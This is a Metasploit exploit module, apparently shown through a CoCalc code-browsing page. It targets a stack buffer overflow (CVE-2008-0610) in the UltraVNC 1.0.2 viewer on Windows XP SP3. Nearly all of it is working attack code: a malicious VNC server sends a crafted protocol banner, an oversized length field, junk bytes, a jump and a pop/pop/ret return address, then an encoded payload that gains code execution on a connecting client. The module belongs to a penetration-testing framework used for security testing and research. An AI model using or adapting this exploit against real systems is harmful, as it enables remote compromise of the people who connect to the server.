CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.

16


17
        If a malicious server responds to a client connection indicating a minor

18
        protocol version of 14 or 16, a 32-bit integer is subsequently read from

19
        the TCP stream by the client and directly provided as the trusted size for

20
        further reading from the TCP stream into a 1024-byte character array on

21
        the stack.

22
      },

23
      'Author'         => 'noperand',

24
      'License'        => MSF_LICENSE,

25
      'References'     =>

26
        [

27
          [ 'CVE', '2008-0610' ],

28
          [ 'OSVDB', '42840' ],

29
          [ 'BID', '27561' ],

30
        ],

31
      'DefaultOptions' =>

32
        {

33
          'EXITFUNC' => 'thread',

34
        },

35
      'Payload'        =>

36
        {

37
          'Space'    => 500,

38
        },

39
      'Platform'       => 'win',

40
      'Targets'        =>

41
        [

42
          [ 'Windows XP SP3',	{ 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2

43
        ],

44
      'Privileged'     => false,

45
      'DisclosureDate' => '2008-02-06',

46
      'DefaultTarget'  => 0))

47


48
    register_options(

49
      [

50
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])

51
      ])

52
  end

53


54
  def on_client_connect(client)

55
    return if ((p = regenerate_payload(client)) == nil)

56


57
    sploit = rand_text_alpha(1100)   	# junk, could be more efficient here

58
    sploit << "\x00\x04\x00\x00" 	 	# value to get around a write

59
    sploit << rand_text_alpha(12)	 	# random junk

60
    sploit << "\xEB\x06" << make_nops(2)	# short relative jump

61
    sploit << [target.ret].pack('V') 	# pop/pop/ret (default is in vncviewer.exe)

62
    sploit << payload.encoded

63


64
=begin

65
    We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").

66
    - These bytes are read directly by a call to ReadExact() with a size of 12.

67


68
    ...

69
    if (m_minorVersion == 14 || m_minorVersion == 16)

70
    {

71
      int size;

72
      ReadExact((char *)&size,sizeof(int));

73
      char mytext[1024]; //10k

74
      ReadExact(mytext,size);

75
      mytext[size]=0;

76
    ...

77


78
    If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.

79
    We then append our data.

80
=end

81
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

82


83
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")

84
    client.put(sploit)

85
    handler(client)

86
    service.close_client(client)

87
  end

88
end

89


90